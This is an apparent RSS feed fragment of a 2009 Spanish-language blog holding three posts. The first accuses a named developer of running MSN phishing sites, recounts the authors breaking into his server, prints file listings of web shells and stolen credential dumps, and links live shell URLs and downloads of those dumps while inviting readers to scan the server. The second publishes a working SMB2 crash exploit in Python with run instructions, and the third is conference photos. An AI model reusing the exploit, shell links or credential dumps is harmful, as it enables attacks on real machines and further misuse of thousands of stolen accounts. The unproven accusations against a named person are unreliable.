<p>Hola a todos, escribo este artículo para evidenciar públicamente la total y absoluta falta de etica del supuesto &#8220;Experto en Seguridad&#8221; Argentino y desarrollador de <a href="http://www.diosdelared.com/redirect.php?go=http://tuquito.org.ar" target="link">Tuquito Linux</a>, <strong><a href="http://www.diosdelared.com/redirect.php?go=http://www.lagaceta.com.ar/nota/347282/Informaci%C3%B3n%20General/Trucos_para_defenderse_ataque_hackers.html" target="link">Mauro torres</a></strong>.</p>
<p><img src="http://www.diosdelared.com/redirect.php?go=http://3.bp.blogspot.com/_qG6dRhwIcsg/SLRtLjByInI/AAAAAAAAAH4/csJu8v3XFpY/s320/remera-tuquito_164.png" alt="" /></p>
<p>Junto a Daniel Godoy continuamos una investigación <strong>iniciada por un tercero</strong> (a quien nombraré si es que me da su autorización), de universomsn.com, un sitio de pishing de correo electrónico. Este sitio utiliza el &#8220;Quien te admite&#8221; para robar emails, acceder a ellos y robar lista de contactos, además almacena todas las contraseñas y los emails robados en una base de datos.</p>
<p>En la IV Jornadas de Software Libre realizamos, en vivo y en directo, una demostración que relacionaba a Mauro Torres con <strong>Universomsn.com</strong>, una web de pishing de msn. Además accedimos al servidor de universomsn y dumpeamos la base de datos demostrando a todos los espectadores que el sujeto había robado más de 3500 mails.</p>
<p><img src="http://www.diosdelared.com/redirect.php?go=http://img692.imageshack.us/img692/9594/pruebaq.png" alt="" width="500" height="391" /></p>
<p>Nos guardamos la guinda para publicar por internet, ahora es el turno de <a href="http://www.diosdelared.com/redirect.php?go=http://msnsinadmision.com/" target="link">msnsinadmision.com</a> subida en el mismisimo servidor de tuquito. Sin duda propiedad de Mauro Torres, al igual que Universomsn, en este caso no ha tenido ni siquiera la dignidad de ocultar el sitio, publicandolo directamente en el <strong>SERVIDOR DONADO</strong> que recibió para tuquito.org.ar. Encontramos montones de backups subidos que van desde los 81mb comprimidos (500 mb reales) con unos 100mil mails/contraseña hasta un backup (que dejo al final) de más de medio giga.</p>
<p><a href="http://www.enmanosdenadie.com.ar/2009/11/tuquito-con-sabor-amargo/"><em>Pinche aquí para ver el vídeo</em></a></p>
<p>No tengo posibilidad de reportar 100mil mails robados, por eso decido hacerlo público antes de que sigan sirviendo a las malas intenciones del ladrón.<br />
Personalmente no voy a denunciar, pero si alguno de los afectados está interesado en hacerlo, no dude en contactar conmigo para recibir toda la información relevante.</p>
<p><img src="http://www.diosdelared.com/redirect.php?go=http://img525.imageshack.us/img525/2604/pantallazomurdermurderx.png" alt="" width="500" height="333" /></p>
<p><img src="http://www.diosdelared.com/redirect.php?go=http://img691.imageshack.us/img691/2604/pantallazomurdermurderx.png" alt="" width="500" height="333" /></p>
<p>Acá dejo un log interesante:</p>
<div>pwd<br />
/var/www/tuquito.org.ar/public_html/videos/wp-content/themes/classic<br />
cd /var/www/tuquito.org.ar/public_html/hack<br />
ls -la<br />
total 527052<br />
drwxrwxrwx  4 root     root      4096 Nov  3 17:31 .<br />
drwxr-sr-x 99 www-data root      4096 Oct 21 16:34 ..<br />
-rw-rw-rw-  1 www-data root    162242 Oct 30  2008 c99shell.txt<br />
-rwxrwxrwx  1 www-data root       122 Mar 13  2008 cmd.gif<br />
-rwxrwxrwx  1 www-data root       122 Mar 13  2008 cmd.gif.php<br />
-rwxrwxrwx  1 www-data root       122 Mar 13  2008 cmd.jpg.php<br />
<strong>-rwxrwxrwx  1 www-data root       122 Mar 12  2008 cmd.php</strong><br />
-rw-rw-rw-  1 www-data root       409 Aug 21 17:10 cookie.php<br />
-rw-r&#8211;r&#8211;  1 www-data root     12080 Nov 25  2008 e.php<br />
-rw-r&#8211;r&#8211;  1 www-data root     10875 Nov 25  2008 e.pl<br />
-rw-r&#8211;r&#8211;  1 www-data root        45 Oct 30  2008 echo.txt<br />
-rw-r&#8211;r&#8211;  1 www-data root     44624 Apr 25  2008 erne.php<br />
-rw-r&#8211;r&#8211;  1 www-data root     44624 Apr 25  2008 erne.txt<br />
-rw-r&#8211;r&#8211;  1 www-data root        85 Aug 21 17:07 fotolog.js<br />
-rw-r&#8211;r&#8211;  1 www-data root       313 Aug 21 16:56 fotolog.php<br />
-rw-r&#8211;r&#8211;  1 root     root        79 Oct 31 15:28 fotolog.txt<br />
drwxrwxrwx  2 www-data root      4096 Oct 30  2008 hack<br />
-rw-r&#8211;r&#8211;  1 www-data root        18 May 30  2008 index.php<br />
<span style="color: red;"><strong>-rw-r&#8211;r&#8211;  1 www-data root 538618251 May 19  2008 msn2DB-120508.sql</strong></span><br />
-rw-r&#8211;r&#8211;  1 www-data root      1905 Apr 24  2008 nc.pl<br />
-rw-r&#8211;r&#8211;  1 www-data root       414 Apr 25  2008 next.php<br />
-rwxrwxrwx  1 www-data root       400 Nov  1 19:54 passwords.txt<br />
-rw-r&#8211;r&#8211;  1 www-data root       291 Apr 25  2008 personal.html<br />
-rw-r&#8211;r&#8211;  1 www-data root       454 Oct 31  2008 personal.php<br />
drwxrwxrwx  4 www-data root      4096 Oct 31  2008 php-mailer<br />
-rw-r&#8211;r&#8211;  1 www-data root      1465 Oct 30  2008 phpbb.pl<br />
-rwxr-xr-x  1 www-data root     10393 Apr 24  2008 prueba<br />
-rwxr-xr-x  1 www-data root     19242 Apr 24  2008 r0nin<br />
-rw-r&#8211;r&#8211;  1 www-data root     38548 Apr 25  2008 safe0ver.php<br />
-rw-r&#8211;r&#8211;  1 www-data root     38548 Apr 25  2008 safemode.txt<br />
<strong>-rw-r&#8211;r&#8211;  1 www-data root     45746 Mar 12  2008 shell.php</strong><br />
-rw-r&#8211;r&#8211;  1 www-data root     19224 Mar 13  2008 shellbot.pl</div>
<p>Curiosidades con las que nos topamos: El experto no pone password de root a mysql, el experto hacer correr apache con suid (root), el experto sube shells sin contraseña para administrar sus servidores y ensima las sube con nombres sencillos como &#8220;cmd.php&#8221; o &#8220;shell.php&#8221;.</p>
<p>La falta de etica no es nada nuevo hoy en día, pero la hipocresía con la que este personaje se autodenomina &#8220;ético&#8221; es increible.</p>
<p>Si alguien quiere continuar la investigación (o hacer algo peor) puede facilmente pasar un nmap y localizar algo que alguien olvidó cerrar :P</p>
<div>pwd;ls -la<br />
/root<br />
total 1352636<br />
drwxr-xr-x 37 root     root        4096 Oct 30 11:28 .<br />
drwxr-xr-x 24 root     root        4096 Oct 29 23:15 ..<br />
drwx&#8212;&#8212;  2 root     root        4096 Dec 10  2008 .aptitude<br />
-rw&#8212;&#8212;-  1 root     root        7972 Oct 31 21:39 .bash_history<br />
-rw-r&#8211;r&#8211;  1 root     root         412 Dec 15  2004 .bashrc<br />
drwxr-xr-x  4 root     root        4096 Dec 10  2008 .gem<br />
drwx&#8212;&#8212;  2 root     root        4096 May 22 18:19 .links2<br />
drwxr-xr-x  3 root     root        4096 Oct 31 18:56 .mc<br />
-rw&#8212;&#8212;-  1 root     root        7432 Sep 10 01:17 .mysql_history<br />
-rw-r&#8211;r&#8211;  1 root     root         110 Nov 10  2004 .profile<br />
-rw&#8212;&#8212;-  1 root     root        1024 May 31  2008 .rnd<br />
drwx&#8212;&#8212;  2 root     root        4096 Feb 12  2009 .ssh<br />
drwxr-xr-x  3 root     root        4096 Jun  6  2008 .subversion<br />
-rw&#8212;&#8212;-  1 root     root        9115 Oct 30 11:28 .viminfo<br />
-rwx&#8212;&#8212;  1 root     root        6413 Jan 10  2008 1.png<br />
-rwx&#8212;&#8212;  1 root     root        6739 Jan 10  2008 2.png<br />
-rwx&#8212;&#8212;  1 root     root        6988 Jan 10  2008 3.png<br />
-rwx&#8212;&#8212;  1 root     root     2126779 Feb 28  2008 BajaRemeras.3gp<br />
drwx&#8212;&#8212;  2 root     root        4096 Jan 17  2007 EGG-INFO<br />
-rwx&#8212;&#8212;  1 root     root      165069 Jan 10  2008 Minty_Pligg_Template.zip<br />
drwx&#8212;&#8212;  2 root     root        4096 Jun 11  2006 NX<br />
-rwx&#8212;&#8212;  1 root     root     6248172 Jan 16  2007 NX-tuquito.tgz<br />
-rwx&#8212;&#8212;  1 root     root       62267 Jan 17  2007 TracAccountManager-0.1.2-py2.3.egg<br />
-rwx&#8212;&#8212;  1 root     root      112205 Jan 17  2007 TracWebAdmin-0.1.2dev_r4240-py2.3.egg<br />
drwx&#8212;&#8212;  4 root     root        4096 Jan 17  2007 TracWebAdmin-0.1.2dev_r4429-py2.3.egg<br />
-rw-r&#8211;r&#8211;  1 root     root      932528 Mar 18  2009 Tuquito-2.0-r5.iso<br />
<strong>-rwx&#8212;&#8212;  1 root     root     1191455 May 30  2008 all-db</strong><br />
drwxr-xr-x  2 root     root        4096 Jun  6 16:37 apache-confs<br />
drwxr-xr-x  7 root     root        4096 Jun  2  2008 apache2<br />
-rw-r&#8211;r&#8211;  1 root     root       24193 Jun  6 02:16 apache2.conf<br />
drwx&#8212;&#8212;  3 root     root        4096 Jul 12  2007 apf-0.9.6-3<br />
-rwx&#8212;&#8212;  1 root     root      105119 Feb 12  2008 apf-current.tar.gz<br />
drwx&#8212;&#8212;  2 root     root        4096 Feb 12  2008 back<br />
drwx&#8212;&#8212;  3 root     root        4096 May 30  2008 backup-apache<br />
drwx&#8212;&#8212;  2 root     root        4096 Jul  1 16:22 backup-db<br />
drwx&#8212;&#8212;  2 root     root        4096 May 30  2008 backup-dbs<br />
-rwx&#8212;&#8212;  1 root     root       18268 Feb 12  2008 bannerMSN.png<br />
-rwx&#8212;&#8212;  1 root     root       20250 Feb 12  2008 bannerMSN2.png<br />
drwx&#8212;&#8212;  2 root     root        4096 Dec 14  2007 bot<br />
-rwx&#8212;&#8212;  1 root     root           8 Jan 10  2008 caca<br />
-rwx&#8212;&#8212;  1 root     root         319 Jan 26  2008 check<br />
-rwx&#8212;&#8212;  1 root     root         137 Apr 25  2008 clave<br />
-rwx&#8212;&#8212;  1 root     root      210944 May 30  2008 databasebackup.sql.bz2<br />
-rwx&#8212;&#8212;  1 root     root           2 Apr 22  2008 done<br />
-rw-r&#8211;r&#8211;  1 root     root        3319 Nov 25  2008 e.php<br />
-rwx&#8212;&#8212;  1 root     root       19707 Dec 15  2007 email<br />
-rw-r&#8211;r&#8211;  1 root     root        1185 Feb 12  2009 example.rb<br />
-rwx&#8212;&#8212;  1 root     root        1687 Nov  9  2007 extrae7<br />
-rw-r&#8211;r&#8211;  1 root     root           0 Oct 30 11:21 fastcgi-php.pid<br />
drwx&#8212;&#8212; 12 www-data root        4096 Jun  9 08:51 fastcgi_temp<br />
drwx&#8212;&#8212; 13 root     root        4096 Jan 29  2008 ffmpeg<br />
-rwx&#8212;&#8212;  1 root     root      173219 Jan 10  2008 futurepligg_03.zip<br />
-rw-r&#8211;r&#8211;  1 root     root         351 Jan  6  2009 google_data_extractor_export.rb<br />
-rw-r&#8211;r&#8211;  1 root     root      145917 Mar 13  2009 grit-1.0.1.gem<br />
-rw-r&#8211;r&#8211;  1 root     root      316136 Mar 13  2009 grit-1.0.1.gem.1<br />
-rw-r&#8211;r&#8211;  1 root     root     1862144 Feb  2  2009 grit-1.0.1.gem.2<br />
drwx&#8212;&#8212; 12      501 staff       4096 May 31  2008 httpd-2.2.8<br />
-rwx&#8212;&#8212;  1 root     root     4799055 May 31  2008 httpd-2.2.8.tar.bz2<br />
-rwx&#8212;&#8212;  1 root     root           0 Apr 25  2008 <strong>john.pot</strong><br />
drwx&#8212;&#8212; 13 deploy   deploy      4096 Jan 29  2008 lame-3.97<br />
-rwx&#8212;&#8212;  1 root     root      510240 Jan 29  2008 lame-3.97.tar.gz<br />
-rwx&#8212;&#8212;  1 root     root     1328058 Jan 29  2008 lame-3.97.tar.gz.0<br />
drwxrwxrwx  7    16424 users       4096 Jun  7 13:16 lighttpd-1.4.18<br />
-rw-r&#8211;r&#8211;  1 root     root      803361 Sep  9  2007 lighttpd-1.4.18.tar.gz<br />
-rw-r&#8211;r&#8211;  1 root     root         592 Apr  1  2009 list-gem<br />
-rwx&#8212;&#8212;  1 root     root          34 Jul 24  2007 mauro<br />
<strong>-rwx&#8212;&#8212;  1 root     root    21848020 Feb  1  2008 msn-db<br />
-rwx&#8212;&#8212;  1 root     root    25584900 Feb  5  2008 msn-db2<br />
-rwx&#8212;&#8212;  1 root     root    88017348 May 12  2008 msn2DB-120508.sql.bz2<br />
-rw-r&#8211;r&#8211;  1 root     root   432214081 May 21 23:01 msn2sql-210509.sql.bz2<br />
-rw-r&#8211;r&#8211;  1 root     root   542418329 May 21 23:09 msn2sql-210509.tar.gz</strong><br />
-rwx&#8212;&#8212;  1 root     root        4693 Mar 28  2008 not_found.html<br />
-rwx&#8212;&#8212;  1 root     root        9359 Jan 12  2007 opcion2nuevo.png<br />
drwx&#8212;&#8212;  9 deploy   deploy      4096 Apr 13  2008 passenger-1.0.1<br />
-rwx&#8212;&#8212;  1 root     root     1668684 Apr 13  2008 passenger-1.0.1.tar.gz<br />
drwx&#8212;&#8212;  3 root     root        4096 May 31  2008 postfix<br />
-rw-r&#8211;r&#8211;  1 root     root         307 Jan  6  2009 prueba.rb<br />
-rw-r&#8211;r&#8211;  1 root     root        1811 Apr  1  2009 prueba3.rb<br />
drwx&#8212;&#8212;  3 root     root        4096 May 16  2007 radio<br />
drwxr-xr-x  4 root     root        4096 Jun  7 12:45 rails-nginx-passenger-ubuntu<br />
-rw-r&#8211;r&#8211;  1 root     root     9903130 Jun 23  2008 repositorio-ultimo.dump<br />
-rw-r&#8211;r&#8211;  1 root     root    11742245 Jun 23  2008 repositorio.dump<br />
-rw-r&#8211;r&#8211;  1 root     root        6591 Dec 10  2008 ring<br />
-rw-r&#8211;r&#8211;  1 root     root        5360 Jun  2  2008 ring-anda<br />
-rw-r&#8211;r&#8211;  1 root     root   197669784 Oct  2  2008 ring-backup<br />
lrwxrwxrwx  1 root     root          38 Jun  7 13:14 ringwii.com -&gt; /opt/nginx/sites-available/ringwii.com<br />
drwxr-xr-x  2 root     root        4096 Jan  6  2009 ruby<br />
drwxr-xr-x  4 deploy   deploy      4096 Jun 23  2008 ruby-enterprise-1.8.6-20080624<br />
-rw-r&#8211;r&#8211;  1 root     root     6950260 Jun 23  2008 ruby-enterprise-1.8.6-20080624.tar.gz<br />
-rw-r&#8211;r&#8211;  1 root     root    20968910 Jun 23  2008 ruby-enterprise_1.8.6-20080624-i386.deb<br />
drwx&#8212;&#8212; 11      503    503      4096 Jan 30  2007 rubygems-0.9.1<br />
-rwx&#8212;&#8212;  1 root     root      190688 Jan 16  2007 rubygems-0.9.1.tgz<br />
drwxr-xr-x  8      501 staff       4096 Apr 11  2008 rubygems-1.1.1<br />
-rw-r&#8211;r&#8211;  1 root     root      423308 May 31  2008 rubygems-1.1.1.tgz<br />
drwxr-xr-x  8      501 staff       4096 Oct 25  2008 rubygems-1.3.1<br />
-rw-r&#8211;r&#8211;  1 root     root      263748 Oct 29  2008 rubygems-1.3.1.tgz<br />
-rw-r&#8211;r&#8211;  1 root     root         829 May 31  2008 script.pl<br />
-rwx&#8212;&#8212;  1 root     root       58860 Feb 27  2007 shoutcast-1-9-5-linux-glibc6.tar.gz<br />
-rw-r&#8211;r&#8211;  1 root     root      138059 Mar  8  2009 socializame.tar.gz<br />
drwxr-xr-x 12      500    500      4096 Mar 25  2009 sphinx-0.9.8.1<br />
-rw-r&#8211;r&#8211;  1 root     root      949660 Oct 30  2008 sphinx-0.9.8.1.tar.gz<br />
drwx&#8212;&#8212;  3 root     root        4096 Jun  2  2008 templates<br />
-rwx&#8212;&#8212;  1 root     root           0 Jan 16  2007 tmp<br />
-rw-r&#8211;r&#8211;  1 root     root        5974 Mar 16  2009 <span style="font-size: xx-small;"><strong><span style="color: red;">tn_madurita amateur gozando01.jpg</span></strong></span><br />
drwx&#8212;&#8212;  5 root     root        4096 Jan 17  2007 trac<br />
-rwx&#8212;&#8212;  1 root     root        7915 Mar  6  2008 trac-a.png<br />
-rwx&#8212;&#8212;  1 root     root         296 Feb 28  2008 video<br />
drwx&#8212;&#8212;  6 root     root        4096 Feb 25  2008 webadmin<br />
-rwx&#8212;&#8212;  1 root     root      505319 Jan 10  2008 ygetblue-v3.zip<br />
-rw-r&#8211;r&#8211;  1 root     root         219 Jul  1 22:57 yovideo.yml<br />
-rwx&#8212;&#8212;  1 root     root      406222 Mar 28  2008 zlib1g-dev_1.2.3-13_i386.deb<br />
-rwx&#8212;&#8212;  1 root     root       70528 Mar 28  2008 zlib1g_1.2.3-13_i386.deb</div>
<p>Enlaces interesantes (subidos en su servidor por Mauro Torres, yo solo lo encontré ahí):</p>
<p>http://www.tuquito.org.ar/hack/shell.php</p>
<p>http://www.tuquito.org.ar/hack/shell.php?cmd=dir&#038;dir=./../../../universomsn</p>
<p>http://www.tuquito.org.ar/hack/shell.php?cmd=dir&#038;dir=./../../../msn2/html</p>
<p><span style="font-size: xx-small;"><a href="http://www.diosdelared.com/redirect.php?go=http://msnsinadmision.com/msn2sql.tar.gz" target="link">http://msnsinadmision.com/msn2sql.tar.gz</a></span><br />
<span style="font-size: xx-small;"><a href="http://www.diosdelared.com/redirect.php?go=http://www.tuquito.org.ar/hack/msn2DB-120508.sql" target="link">http://www.tuquito.org.ar/hack/msn2DB-120508.sql</a></span></p>
<p>Les pido a los que lleguen a tiempo para contrastar la información, lo certifiquen en un comentario. Seguramente todo esto deje de estar online en poco tiempo.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>La gran duda que se me plantea luego de leer el post es si la distribución Tuquito no esconde scripts sucios o artimanias similares para el robo de información de los usuarios.  Para contestar esta pregunta, habría que leer el código fuente de la distro en detalle y no solo eso, además se debería chequear que los binarios en la ISO de Tuquito coincidan con los binarios generados a partir del código.</p>
<p>Diego</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2009/11/tuquito-con-sabor-amargo/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Nueva vulnerabilidad en windows</title>
		<link>http://www.enmanosdenadie.com.ar/2009/09/nueva-vulnerabilidad-en-windows/</link>
		<comments>http://www.enmanosdenadie.com.ar/2009/09/nueva-vulnerabilidad-en-windows/#comments</comments>
		<pubDate>Thu, 10 Sep 2009 15:30:16 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[peligro]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[seven]]></category>
		<category><![CDATA[SMB2]]></category>
		<category><![CDATA[vista]]></category>
		<category><![CDATA[vulnerabilidad]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=508</guid>
		<description><![CDATA[Se detectó una nueva y muy grave vulnerabilidad en el sistema operativo de Micro$oft que afecta las versiones &#8220;Vista&#8221; y &#8220;Seven&#8221;. La misma es una falla en SMB2 y permite colapsar remotamente un equipo, haciéndolo mostrar la famosa blue screen of death y obligándolo a reiniciarse, obviamente perdiendo toda la información de la sesión. El [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter size-full wp-image-521" title="agujero" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/09/agujero.jpg" alt="agujero" width="289" height="271" /></p>
<p>Se detectó una <strong>nueva y muy grave vulnerabilidad</strong> en el sistema operativo de Micro$oft que afecta las versiones &#8220;Vista&#8221; y &#8220;Seven&#8221;. La misma es una falla en SMB2 y permite colapsar remotamente  un equipo, haciéndolo mostrar la famosa <span style="color: #0000ff;"><strong>blue screen of death</strong></span> y <strong>obligándolo a reiniciarse</strong>, obviamente<strong> perdiendo toda la información</strong> de la sesión.</p>
<p>El <a href="http://es.wikipedia.org/wiki/Guion_%28inform%C3%A1tica%29" target="_blank">script</a> para explotar dicha <a href="http://es.wikipedia.org/wiki/Error_de_software" target="_blank">vulnerabilidad</a> está escrito en <a href='http://es.wikipedia.org/wiki/Python' target='_blank'>Python</a> y es el siguiente:</p>
<pre style="padding-left: 30px;"><span style="color: #3366ff;">#!/usr/bin/python
# When SMB2.0 recieve a "&amp;" char in the "Process Id High" SMB header
# PAGE_FAULT_IN_NONPAGED_AREA 

import sys
from socket import socket
from time import sleep

</span><span style="color: #3366ff;">host = sys.argv[1], 445</span>
<span style="color: #3366ff;">buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 &amp; sub 0xc853
"\x00\x26"# Process ID High: --&gt;  normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
</span></pre>
<p><span style="color: #3366ff;"> </span>Para ejecutarlo, creamos un archivo  script.py  pegamos el script de arriba dentro del mismo. Hay que modificar donde dice &#8220;IP_ADDR&#8221; por la <a href='http://es.wikipedia.org/wiki/dirección IP' target='_blank'>dirección IP</a> de la máquina objetivo y lo guardamos.<br />
Luego damos permisos de ejecución al script desde una terminal con:</p>
<p style="padding-left: 30px;">dfa@diego-factory:~$ <strong><span style="color: #3366ff;">chmod +x script.py</span></strong></p>
<p>y lo ejecutamos:</p>
<p style="padding-left: 30px;">dfa@diego-factory:~$ <strong><span style="color: #3366ff;">python script.py [ ip ]<br />
</span></strong></p>
<p>Microsoft no tiene solución aún para este problema, por lo que lo único que  pueden hacer <strong>los tristes usuarios de Windows</strong> para evitar abusos es desactivar SMB2 o en todo caso, cerrar el puerto 445 o mejor aún, instalar en sus computadoras <a href="http://goodbye-microsoft.com/" target="_blank">un sistema operativo libre y seguro</a>.</p>
<p>La <a href="http://milw0rm.com/exploits/9594" target="_blank">fuente original del exploit</a> y la noticia en general me llegó gracias a <a href="http://www.codigounix.com.ar" target="_blank"><strong>tty0</strong></a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2009/09/nueva-vulnerabilidad-en-windows/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Crónicas del Sur</title>
		<link>http://www.enmanosdenadie.com.ar/2009/08/jornadas-del-sur-parte-1/</link>
		<comments>http://www.enmanosdenadie.com.ar/2009/08/jornadas-del-sur-parte-1/#comments</comments>
		<pubDate>Wed, 19 Aug 2009 03:21:34 +0000</pubDate>
		<dc:creator>Diego</dc:creator>
				<category><![CDATA[Actualidad]]></category>
		<category><![CDATA[diseño web]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software Libre]]></category>
		<category><![CDATA[charlas]]></category>
		<category><![CDATA[del]]></category>
		<category><![CDATA[jornadas]]></category>
		<category><![CDATA[libre]]></category>
		<category><![CDATA[sur]]></category>

		<guid isPermaLink="false">http://www.enmanosdenadie.com.ar/?p=355</guid>
		<description><![CDATA[Bueno, estoy de regreso en Buenos Aires realmente muy pero muy contento porque las Jornadas del Sur fueron un éxito. 3 días de charlas y talleres, gran asistencia de público, buena comida, nuevos y viejos amigos y sobre todo, mucha informática y cultura libre. Todo lo que un geek de sangre puede pedir. Las fotos:]]></description>
			<content:encoded><![CDATA[<p>Bueno, estoy de regreso en Buenos Aires realmente muy pero muy contento porque las <a href="http://www.jornadasdelsur.org.ar" target="_blank">Jornadas del Sur</a> fueron un éxito.<br />
3 días de charlas y talleres, gran asistencia de público, buena comida, nuevos y viejos amigos y sobre todo, mucha informática y cultura libre. Todo lo que un geek de sangre puede pedir.</p>
<p>Las fotos:</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-394" title="DSCF1467" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1467.JPG" alt="DSCF1467" width="527" height="399" /><br />
<img class="aligncenter size-full wp-image-407" title="DSCF1479" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF14791.JPG" alt="DSCF1479" width="517" height="389" /><br />
<img class="aligncenter size-full wp-image-409" title="DSCF1486" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1486.JPG" alt="DSCF1486" width="517" height="389" /><img class="aligncenter size-full wp-image-418" title="DSCF1482" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1482.JPG" alt="DSCF1482" width="517" height="389" /><br />
<img class="aligncenter size-full wp-image-411" title="DSCF1485" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF14851.JPG" alt="DSCF1485" width="517" height="389" /><br />
<img class="aligncenter size-full wp-image-397" title="DSCF1495" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1495.JPG" alt="DSCF1495" width="527" height="399" /><img class="aligncenter size-full wp-image-412" title="P1020311" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/P1020311.JPG" alt="P1020311" width="650" height="490" /><img class="aligncenter size-full wp-image-413" title="P1020209" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/P1020209.JPG" alt="P1020209" width="650" height="490" /><img class="aligncenter size-full wp-image-414" title="P1020212" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/P1020212.JPG" alt="P1020212" width="394" height="522" /><br />
<img class="aligncenter size-full wp-image-398" title="DSCF1498" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1498.JPG" alt="DSCF1498" width="527" height="399" /><br />
<img class="aligncenter size-full wp-image-399" title="DSCF1513" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1513.JPG" alt="DSCF1513" width="399" height="527" /><img class="aligncenter size-full wp-image-401" title="DSCF1521" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1521.JPG" alt="DSCF1521" width="527" height="399" /><img class="aligncenter size-full wp-image-400" title="DSCF1519" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/DSCF1519.JPG" alt="DSCF1519" width="527" height="399" /></p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-423" title="Remera" src="http://www.enmanosdenadie.com.ar/wp-content/uploads/2009/08/Remera1.jpg" alt="Remera" width="614" height="463" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enmanosdenadie.com.ar/2009/08/jornadas-del-sur-parte-1/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>

